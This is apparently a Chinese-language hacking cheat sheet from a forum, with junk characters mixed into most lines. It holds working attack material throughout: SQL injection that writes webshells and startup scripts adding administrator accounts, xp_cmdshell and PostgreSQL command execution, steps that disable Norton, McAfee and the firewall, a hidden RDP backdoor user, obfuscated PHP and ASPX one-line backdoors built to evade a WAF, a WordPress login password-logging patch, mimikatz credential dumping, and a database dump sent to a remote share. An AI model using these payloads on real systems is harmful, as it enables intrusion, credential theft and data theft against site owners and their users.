& ?; B0 H' V5 v8 Q9 vinsert into a values ("set wshshell=createobject (""wscript.shell"") " );! T$ z7 X/ B! j, {- Q
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 _) L+ T3 L5 j- U) ainsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
! l0 x4 e7 q% @% W' o+ eselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";0 H9 u+ |0 W- w! F# J1 Z/ {( J
drop table a;6 {8 {/ @5 _ G
9 O5 e1 p9 |2 m% q: d6 Y英文版本:
- ^" O, C$ y# X" b' H
; T6 B7 a+ i4 |+ d5 ~/ `' }0 Zuse test;
# z4 u& k' J3 xcreate table a (cmd text);5 `4 @+ {0 [. u0 Y4 g1 d* _9 N0 m
insert into a values ("set wshshell=createobject (""wscript.shell"") " );( k" d% K: F& P5 ^9 P; I
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
' J6 }& \( j$ ?6 |9 E* ?insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% q1 p) L8 ^0 w: Q
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
1 _" j; [1 P4 ~: i6 Zdrop table a;
( ^3 q( e9 { _; v- y ~/ w2 U% ^+ W# g! @; U- z
create table a (cmd BLOB);, y0 Z4 ^8 V4 K, @7 \
insert into a values (CONVERT(木马的16进制代码,CHAR));3 k" a" ?4 y; s8 S
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
- a; b O8 I: M: o4 Mdrop table a;; u$ B+ B0 q; E1 i6 ?. ?$ f
5 @ ~* [7 C5 g g" @9 X- F
记录一下怎么处理变态诺顿
+ ?4 l+ y. t5 T3 c! t查看诺顿服务的路径) ^5 a% Q# _7 E( i0 I
sc qc ccSetMgr: A6 P+ [- D# M4 ? n* H
然后设置权限拒绝访问。做绝一点。。* e+ n4 G M, G3 T x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system8 r d: i6 P% Q/ B+ x% Y% p
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"& G! d& E e0 ~' I! l5 J8 E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators7 `' b$ w1 p. H' e! ~4 T" N1 X4 u
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone; i1 R# o2 R5 D7 b
8 U- q! M5 h" M$ a h" A$ Y8 X- d然后再重启服务器6 b) T/ }3 y# @ R
iisreset /reboot* H7 x1 U; u" R: i) [2 n9 {
这样就搞定了。。不过完事后。记得恢复权限。。。。
. |- L0 B' p" R6 p' ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
% F9 o$ |1 _& ?0 Y! w* zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
3 f4 @- z: t; d5 Y2 I; [" Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F- O8 `4 |" _5 ?9 g! L/ m
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F5 E; w- m4 [ n+ B( y
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin) L& }4 @% C- ?: N
. S2 A+ d/ ^8 g$ |! q! w
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
. s! x& @5 C) G7 ^6 Z3 ^$ a4 f: f4 A* F" ]9 X' }5 E
postgresql注射的一些东西/ V" k3 j# h F1 G6 u8 s* n3 O
如何获得webshell
y7 X7 k+ J0 X( B' Jhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 7 v) n( g/ Z+ |
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); * {5 T2 V1 D# r' ~. b$ E2 w
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;# Q2 h" \3 e e5 k: G
如何读文件
2 N; a$ r) Q# m$ z: F6 uhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
$ I4 m; q3 L5 k1 e6 E. m/ qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
! u6 g) ~6 r+ J* G, Y) l7 Z7 Y: Y' xhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
R# q* `$ s3 b6 a/ u/ @ C% ^2 R* o# G
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- D) g9 Q2 H3 s' M4 t
当然,这些的postgresql的数据库版本必须大于8.X7 t9 a7 R+ ^$ t2 z9 l8 M3 D
创建一个system的函数:3 l9 F( R. z% m1 `+ k6 f
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
" r5 a) E) o$ T# }) Q2 f; s. Q) ]! @3 P0 Y
创建一个输出表:2 B" R6 A* t# j7 @0 [! K3 N2 N
CREATE TABLE stdout(id serial, system_out text)6 W6 b# P+ S+ V
/ d& U3 }; R" c9 W7 E- \
执行shell,输出到输出表内:
4 Z3 R d8 G# r3 f# r6 I+ fSELECT system('uname -a > /tmp/test')
( W6 x! G0 _3 q- z! h
) z0 z3 N, ?! y4 E2 Kcopy 输出的内容到表里面;, T4 K# O; r4 n7 M c1 j! i
COPY stdout(system_out) FROM '/tmp/test'5 @7 R* F* Z# T$ H; c) N7 m
- ^1 ?$ A/ ~- X9 |8 c. _从输出表内读取执行后的回显,判断是否执行成功
+ w1 v3 S% S) y- [4 y" W: D' @8 [6 _+ v
SELECT system_out FROM stdout
2 F8 F) x* T4 F: E% `' Z% D. y下面是测试例子1 [, S- U2 h ~ y$ Y5 a
% q% O; E+ U# A! a6 h. U1 g6 M
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 5 C# }( h; b# d$ t7 B2 [) K
3 a' G2 c; N. _. D/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'7 g3 ^; [) o6 H. k, Q
STRICT --1 x5 s6 a8 _# \! q
3 V, d" l5 L G/store.php?id=1; SELECT system('uname -a > /tmp/test') --7 @% J, n) r& _
9 V9 Q! f2 ~( W& F/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --7 N2 O- E8 q# ]; P. e) G, D5 X
# ]) Q; q- D* u0 w
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
7 W, p' F4 q- f% a: z; Fnet stop sharedaccess stop the default firewall
+ I6 H, A4 _* i5 P; S8 _( Y vnetsh firewall show show/config default firewall
1 d: P7 u* [) d) k$ anetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
% w) G/ R) b& p% jnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
& x$ w F+ Z& x! g5 h& w8 _修改3389端口方法(修改后不易被扫出)
6 t5 s `& H" M( k' e修改服务器端的端口设置,注册表有2个地方需要修改! w% b$ Q! x+ m8 T9 c. {: {
! e$ d! h R1 D! K6 H- |8 k1 L; I[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
6 v- F' l, C6 v R0 }2 _PortNumber值,默认是3389,修改成所希望的端口,比如6000
* L8 R% D0 Y6 }" m; W
2 y5 g% i8 g& a第二个地方:& n* R" @- K ^* G+ W& {
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
. H. ^) G+ O1 ZPortNumber值,默认是3389,修改成所希望的端口,比如6000
2 x) O8 |1 j' Z" u; P K, W# v; ^2 n. B2 G( O
现在这样就可以了。重启系统就可以了
# T! N( x1 s- `0 J
, k( y( H* \* R( @7 }$ u* {查看3389远程登录的脚本: [; d7 c9 M! P: t* { z
保存为一个bat文件
0 f! S, T8 j+ X0 B7 Kdate /t >>D:\sec\TSlog\ts.log. x) i# N9 E$ _* y: Q, s8 Y
time /t >>D:\sec\TSlog\ts.log* a$ T8 F$ }8 g& M& _6 ?: R7 k( z
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
1 L. U K5 n" ^5 o5 cstart Explorer: x& k6 b4 m; j% k4 q
& L4 @2 c8 O9 B: Umstsc的参数:7 ^/ {' W# K% z
! h* G8 F/ x) d" |# d( P
远程桌面连接0 L6 F h7 n2 c
+ g: i( F7 v7 b4 U' V3 K, X x. qMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
+ S4 @1 a% j& _/ Z1 E [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?) [4 Q% s/ y/ Y4 a' D2 H _( B
/ d2 r0 w% @8 M) A- N1 [
<Connection File> -- 指定连接的 .rdp 文件的名称。& ~" G* J' h7 @# A/ d
+ q- O% p4 \8 g
/v:<server[:port]> -- 指定要连接到的终端服务器。
* x) W \ x0 _
4 G) g6 t3 r# P& ~8 N: x/ i/console -- 连接到服务器的控制台会话。
4 |2 y5 I' I4 o0 p
) i9 W+ v+ A2 s+ x. P8 v9 [2 G; A* R9 `/f -- 以全屏模式启动客户端。
, b8 D: V) g4 O
6 w# P3 o ]7 b/w:<width> -- 指定远程桌面屏幕的宽度。
6 H3 Z' k2 O5 S; G1 A7 s6 O; C+ i
/h:<height> -- 指定远程桌面屏幕的高度。" T! Z% Z3 Z) m2 T
2 r1 x" Z! }0 v
/edit -- 打开指定的 .rdp 文件来编辑。
* M5 `3 s) e! A3 m* H; W3 n/ r% K$ Z5 v2 q
/migrate -- 将客户端连接管理器创建的旧版- w, n3 M/ q; ~7 ~3 M
连接文件迁移到新的 .rdp 连接文件。" u! s [) R0 e& |$ J( G- t( `% i
3 w; h- G p% S4 w0 l& g, _
* q! Z4 \. z& q其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就0 {) S& y# N% a' j. b4 s
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
% H k5 Z) n& J$ W3 D' U$ Y4 N1 D7 `6 ^8 K; K) Z7 n
命令行下开启3389
- d0 \1 z% S: g+ v( N' Xnet user asp.net aspnet /add+ X% ~, a) J9 Z) E) X( i
net localgroup Administrators asp.net /add
5 R0 k. R3 y8 L9 J$ \net localgroup "Remote Desktop Users" asp.net /add
; P2 p" [ e, @# C4 dattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
/ ]9 O7 I# a! r% ^9 ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 09 w: X/ }& n1 E9 b1 w5 D* W7 }, F
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1! {. q" z8 q. M- t5 t
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f" {6 ?8 S7 s7 }( R8 b' g7 L8 u4 d
sc config rasman start= auto
! ~/ y# u1 z, \- q( v: J/ F" _sc config remoteaccess start= auto* g3 x/ @. N1 V" p. h, }* R
net start rasman
3 d8 m0 W& f+ D0 ynet start remoteaccess
# x" o# S: M. t- R( ?Media' n' l2 C6 ]% N. W, u
<form id="frmUpload" enctype="multipart/form-data"
3 [$ G' f! E6 K- I r9 r5 n* laction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
& I; }* y. v9 u8 ~, N" n' Y0 `<input type="file" name="NewFile" size="50"><br>, z5 ~& e3 A$ Q" j
<input id="btnUpload" type="submit" value="Upload">: G; f) Q: e6 Z z I- O) e+ }
</form>
9 x3 B! v# W: ?& B$ k7 m& V6 F, |
# o9 Z0 O+ z& @$ Ucontrol userpasswords2 查看用户的密码
9 x/ h* z8 u+ t" o$ Yaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
) D& l! a/ e) Y o& r3 m: |SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a- A( o. @6 i5 q: s
5 c' @1 N/ U: p1 ]: Q: R141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:5 i+ Z5 |! I$ z
测试1:8 ?, q1 `- _' {$ [- M
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1$ j" }, B: }' P+ A7 B/ Z* G+ W
' F, J8 |6 c5 q! ?1 j9 r4 D测试2:
, g5 M: X$ w4 f; f* q% I- h: Q( T3 T$ u0 l6 K
create table dirs(paths varchar(100),paths1 varchar(100), id int)
: R7 b) t8 X. ?. U. ^
5 d; Y- i& W9 f) c# M% `delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
5 r9 G4 t) R/ M& v4 m% f, n F& |8 N: i3 ?- ?2 l5 E
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
# r. W0 O0 ~+ B1 t+ \( b7 @% ?关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令" }: s& L2 _! X& @& z. w( K
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;* i0 ?4 V& N. U# s1 p# G
net stop mcafeeframework# x8 }$ i7 a+ t: O6 U6 ]7 v, }
net stop mcshield
" m8 e* |& h5 i9 m3 R. f% C2 unet stop mcafeeengineservice
0 c3 k/ ^$ M7 N+ b8 wnet stop mctaskmanager5 |3 H9 P2 @+ N1 L
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D; w5 Y* u* ~8 F9 O; _
0 }. U) h( A- y) o4 b+ i) [ VNCDump.zip (4.76 KB, 下载次数: 1)
" R3 p J# e, _, e( z j, r8 d密码在线破解http://tools88.com/safe/vnc.php
5 A; B* {0 i0 B l. oVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
9 o d0 L8 S7 l% Y( O& W( A' l$ X8 {+ y
exec master..xp_cmdshell 'net user'
% `% H6 ~( y4 s }! x6 Gmssql执行命令。! G2 {8 s; W3 V h4 y1 ?3 A/ T
获取mssql的密码hash查询6 n8 c$ e. s, N* G8 E( y, q
select name,password from master.dbo.sysxlogins# D- r8 y/ z# B6 M! f8 a- n/ z0 d
, ~) t% V% f: e' {/ F3 ?9 Y
backup log dbName with NO_LOG; U- Y0 C1 |1 Z# R- M
backup log dbName with TRUNCATE_ONLY;
! a' m1 y- d8 S/ j" u3 QDBCC SHRINKDATABASE(dbName);
$ Q8 X) r3 m, o, Mmssql数据库压缩5 L. c, v- }; d
- t; I* X) m: l$ Z
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK: Q! Q# `( g2 F4 ]8 U
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
( B% l- G6 Y, D0 T8 v
8 W- M Q" c% [7 R9 c$ vbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'% X2 V% w6 e2 u- u3 [% w
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak$ c; q3 A2 r+ x: M4 W
) ~+ \% ]2 h4 T1 ?1 n
Discuz!nt35渗透要点:
7 T3 g4 e/ ?' g6 h+ ^, @# C: A(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default$ Y3 d: G1 S Q; W$ S0 {
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>6 A4 z) J7 F% u: k3 e* E4 ^1 U
(3)保存。1 b4 p3 U7 Z S3 U
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass# X& D, |3 n5 Y
d:\rar.exe a -r d:\1.rar d:\website\8 M* @6 ?* F) {9 `
递归压缩website+ |0 S3 M* x# c+ y( G
注意rar.exe的路径( |) X2 o4 f5 s' y
. |3 B+ ?! Q3 K
<?php
+ f/ R0 p) g* c7 u4 h, A+ [
0 u& j! A4 Q+ v2 E$telok = "0${@eval($_POST[xxoo])}";
1 j/ p3 u9 a! U8 h& O- R8 m, a5 b9 ~% V3 u4 g5 D4 K) N
$username = "123456";
* v( S; a" o6 L- v$ S
4 U4 K d' U5 h) z* l1 U \/ f2 O$userpwd = "123456";# e( K u* \6 X. ~
8 Y6 V5 r3 V' N: q% A$ \
$telhao = "123456";+ X; A1 y! R: t& U. S8 {% b- S+ A! r
% U {. E0 C7 |/ b
$telinfo = "123456";0 i! ^ n1 r* n
6 T. ^. u0 P- u?>, `0 F. g0 @& F8 f1 m
php一句话未过滤插入一句话木马( B H# t& K& l- j4 d. H
& L$ z. Z7 y/ O' e
站库分离脱裤技巧
; @& O, J: D+ y3 G) Fexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
( ^. S. e# ^6 d- `$ Kexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'' ]+ F6 u/ N: p. O0 x3 ^! ^/ n% K4 P
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。0 t4 n" N/ E6 ?* B
这儿利用的是马儿的专家模式(自己写代码)。/ {0 x w& A: b( W5 V$ R! U
ini_set('display_errors', 1);* Z6 j/ Z% a( @) Y; t. L5 ]$ Z
set_time_limit(0);* D) t4 K; U9 J: y! S, i
error_reporting(E_ALL);. a: B E4 a- P& \$ K: w. D
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
0 X( e. i5 `1 G: Q9 Emysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
5 V/ y8 b+ ]# X. L5 }. p; r' i$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
9 u/ ~6 Z! ^3 f; o5 q3 u# o$i = 0;
6 S6 [: f; P* _, n) y$ L$tmp = '';
) ]0 |4 T1 N6 S# ^! k* ?while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
9 Y9 ?& L( _- O $i = $i+1;) V' M- V* F4 ^( M k
$tmp .= implode("::", $row)."\n";
0 }- X8 }( C9 D. { if(!($i%500)){//500条写入一个文件
' Z/ k5 p0 n, Y8 u6 o; N0 S/ ^ $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
* I# Q7 ^3 ^- H& O) H: D- h file_put_contents($filename,$tmp);
9 j0 ]) \' `9 y3 h. c7 R) N) N5 ~ $tmp = '';
8 |( M! z; a5 a( ` }: W8 ?2 W3 n* J3 s0 u: J7 U
}
9 ]* {+ ?/ V- x3 w' w' qmysql_free_result($result);
& @2 o6 U% S6 I3 g9 c8 l
* K$ b1 g S8 V( x7 s/ N/ k" Y( W2 V+ D) e( _
7 Q5 `' `& d. O9 k
//down完后delete5 p2 R/ Y$ c% @9 k& G2 b
# y/ r% o" w- W" L& u( R
7 o) y# h; t- z) ]) z" F
ini_set('display_errors', 1);
: D" k0 ^: A0 Y9 Berror_reporting(E_ALL);4 j# N2 U, C7 p+ Q$ K* J, ]
$i = 0;/ k' t4 U; J {$ X) v o
while($i<32) {9 b; n& o3 F- x8 v
$i = $i+1;0 Z% P; O* N/ f* |
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';- S+ D/ [" D! J- O
unlink($filename);
j/ v' s9 A! m( I1 h0 i. ^! s} 9 {3 `! p- b/ [9 W% w- d4 H- I
httprint 收集操作系统指纹
1 ?% ?6 {# {% R8 V% R扫描192.168.1.100的所有端口- g/ d% s: @6 ~7 A
nmap –PN –sT –sV –p0-65535 192.168.1.1004 Q/ q& J2 Y h$ X: {9 p V; e
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
& l6 ]; V2 x9 C! Xhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
6 u8 Q5 y- x' w% @# hNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
2 ~& ]# l' E X, W8 ], V
; D. u! J6 m( ]% y7 h8 `( i( MDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)5 I+ m0 b2 f- o' l6 `
: ~! T2 k4 W! E1 m: v% w MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
1 r1 ?& I* b6 y1 G8 W
$ g/ G4 b$ w! _" C* j9 p9 { Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
2 N1 Z" O8 }2 n
0 ^, Q) X8 t" ?7 T0 g3 E* p DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)! w6 P0 A, [4 e; H4 G0 K
$ X& I+ S# q- c& i) c& p* j5 [/ } http://net-square.com/msnpawn/index.shtml (要求安装)
7 q. N4 i8 T8 \/ t8 W6 m
2 E) l2 V% M8 ?2 n tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
# D; ^( W$ H4 g$ \0 }9 J& m! t) D3 m9 `# Q8 L o9 K& L
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找). ] G6 l8 v% M. j5 z: [
set names gb2312) J: d( i4 B6 P+ L( H
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。$ F6 C. V" u1 W9 |9 X3 H" a
; c; M( k) f6 i
mysql 密码修改
4 F0 a; g& p2 vUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” & O4 p8 i% c V X* O. N, M
update user set password=PASSWORD('antian365.com') where user='root';+ Q2 U4 s2 }. r9 r" o! T0 t, S0 @1 _
flush privileges;" f8 C4 Y$ M% S
高级的PHP一句话木马后门
; E. r: j3 z$ o2 {/ z
, v) @ r, H6 O. q! [; m( @4 {# J' B( |1 F& t入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀* I W6 p- \% P: |( Q6 |
. {' B' e8 z, R$ w# t- ?& I1、- _! R: e4 g: k9 |+ I
, o8 U) i2 }% F. O7 Q$ I; r9 ~
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";, [9 z& j# o6 J1 I3 z. V) B% Y. f
- d( t+ ?9 A* J) u+ W7 o$hh("/[discuz]/e",$_POST['h'],"Access");- ]4 V W$ }# J. T, `
' e1 V! ^2 A. d1 l1 f//菜刀一句话( Y/ v1 x1 j |* x: Y
8 v: C+ }+ i! ^$ n2、
( M3 h+ C0 ^9 ~- Y
' k7 r* ?, S8 W8 H3 L. P$filename=$_GET['xbid'];
$ U" q3 t7 ^7 I, _) K0 C( @9 }, ^5 ?# Y3 Z) Y, k
include ($filename);
2 R% T& M9 g: F5 u; C3 }3 n& E- q$ D) _/ q. n( X
//危险的include函数,直接编译任何文件为php格式运行. f* R. j$ h4 U, ?: ]- V
7 W. v( T6 J/ b* Q6 j# u
3、5 y$ \% q+ {0 x+ t& m; {
/ j, a w P% K: L5 N$reg="c"."o"."p"."y";
& s; N9 [) b( w$ J5 M2 ~" P' u2 J5 G
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
2 z" l/ {' t; } d% n0 u' }3 h6 K' h2 Q7 }
//重命名任何文件
. l8 Y. B' H& ]* ]9 i# q* ?: t. l* Z0 Y. k
4、
) @7 {; ^5 |; }- M7 D" v
+ `" O# a8 C, j& J; w$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
2 m ?- J$ \+ r* F' D0 }( r+ h$ L
- _( @0 y( v- Z& j+ [$gzid("/[discuz]/e",$_POST['h'],"Access");
2 n: p* W N8 ~7 H% ?* c
5 S& d2 `9 M, m//菜刀一句话4 A& E }, M8 Y/ R7 n
9 h% z; e4 j% D T; w1 k% _5、include ($uid); q J/ W/ w. o/ N0 k
" z! X* I7 o$ ?8 m7 q* U
//危险的include函数,直接编译任何文件为php格式运行,POST 0 u- _* n/ w# m) M! a$ d. @
: D/ p$ [, ` \( o7 R9 ^
1 A. v# h3 G* ~8 w; k4 w- P//gif插一句话: [: C. @4 K( f
: }5 m, Q8 y7 P- c
6、典型一句话
/ g1 B4 U# ?. N: [! B- z" W O
- n' X. i, F) q: s+ V5 T程序后门代码+ R' z2 X& }5 i' [! [2 ^6 c+ W
<?php eval_r($_POST[sb])?>! _6 o$ @! t4 O& B4 S
程序代码8 _/ C4 C+ Q1 n1 x. n
<?php @eval_r($_POST[sb])?>; S0 J+ p" h! a5 v
//容错代码
1 V$ J2 a- Y4 I6 z" j) O' H# K2 ]程序代码
, w! _! T+ m" z c$ m5 X W3 H8 i<?php assert($_POST[sb]);?>' R) }( y- W# s1 c2 f- |
//使用lanker一句话客户端的专家模式执行相关的php语句1 s' r% z$ l/ E
程序代码
$ F0 o9 @- s) H: P% C% ] {<?$_POST['sa']($_POST['sb']);?>
" r! y. e) L( q: T" |4 K J6 Q4 g& ^程序代码) e0 V( X) I7 n* x: r
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
% L" x+ f, ~# A5 V7 E& o2 |3 @! a* G程序代码2 o# e! {: T& A, U2 M
<?php. M j3 s [# p/ c' F% s! t n: l
@preg_replace("/[email]/e",$_POST['h'],"error");# l7 `: G6 J3 T/ E3 k& C' a8 }6 G3 R0 s
?>5 j) h- M' |0 P$ F1 l& n$ I8 b% t
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入- U6 C, W. R) Y* F0 p
程序代码
) a/ N0 B( f" b/ z: j<O>h=@eval_r($_POST[c]);</O>& P$ e0 [) p: d
程序代码
0 @3 r# N" @! J+ Q5 V$ s' s! F7 i( ?<script language="php">@eval_r($_POST[sb])</script>" W9 p! \0 L& v0 z; |# b4 E
//绕过<?限制的一句话. Z( D. C$ C2 y! _; w5 z
/ y8 |, _" V3 `4 T" ?( E$ r
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip. W2 r3 E7 b# s
详细用法:1 @1 P9 ?% |8 | I# Q* F" ]- T% n
1、到tools目录。psexec \\127.0.0.1 cmd
5 k7 r4 |! @4 ^6 F3 E' e d N2、执行mimikatz
1 B) C# i# K6 V3 Q! T" N( B3、执行 privilege::debug
9 z$ s# S9 B6 l2 }! Q4、执行 inject::process lsass.exe sekurlsa.dll
, R: A3 ]; q; h4 v8 c. ^2 z% ~; g+ ?5、执行@getLogonPasswords6 c" p9 {( X2 G6 C+ M2 d
6、widget就是密码5 a' o& ~1 R' |) E# R) a% d0 H
7、exit退出,不要直接关闭否则系统会崩溃。+ Z: V# m8 Q: t, @3 _
- U Z) w( \ S B( a: r* }
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面8 D1 [+ x! V& {7 j4 k* u: g
8 D9 v, s5 |5 s9 ~* @自动查找系统高危补丁
- \# r! H, i! Q% [systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
. ?8 e! B' d0 n% X" z5 ~8 b' u* \
9 e, }3 F& Y& s) p O突破安全狗的一句话aspx后门) w, a4 w I$ a1 Y
<%@ Page Language="C#" ValidateRequest="false" %>4 f" ]; k8 J' G: ?- k; u
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%># v+ ]0 K% ~( U2 m
webshell下记录WordPress登陆密码
` x, e( R/ E3 B2 u+ K1 mwebshell下记录Wordpress登陆密码方便进一步社工& o$ ^4 a4 B# f
在文件wp-login.php中539行处添加:
0 V) r& \5 b% }, `' }" e9 G// log password
0 C' \ k2 X" }+ j5 B) ^$log_user=$_POST['log'];
* k) @3 L8 m6 I2 w; [$log_pwd=$_POST['pwd'];
- j3 h5 Q0 j1 H4 `! j; x$log_ip=$_SERVER["REMOTE_ADDR"];% D! Y& q _: Q! ^1 z/ X M
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
& u# Y( {9 _9 k6 z' P$txt=$txt.”\r\n”;
* H5 G* _$ P% G3 N+ rif($log_user&&$log_pwd&&$log_ip){
' z" f( O4 d" b- B@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
1 k3 a) |9 I6 k4 ^. y2 o) I}% O( w' G, r" I* y1 Z: x5 m
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
7 y4 g6 Y5 f: }: \就是搜索case ‘login’
7 A& Q" q* K- g! M) [: b在它下面直接插入即可,记录的密码生成在pwd.txt中,
4 \( D2 E M: H其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
. \) V" G) `8 N3 E/ Y利用II6文件解析漏洞绕过安全狗代码:
4 L y. E% R7 L+ `5 W8 }7 N;antian365.asp;antian365.jpg
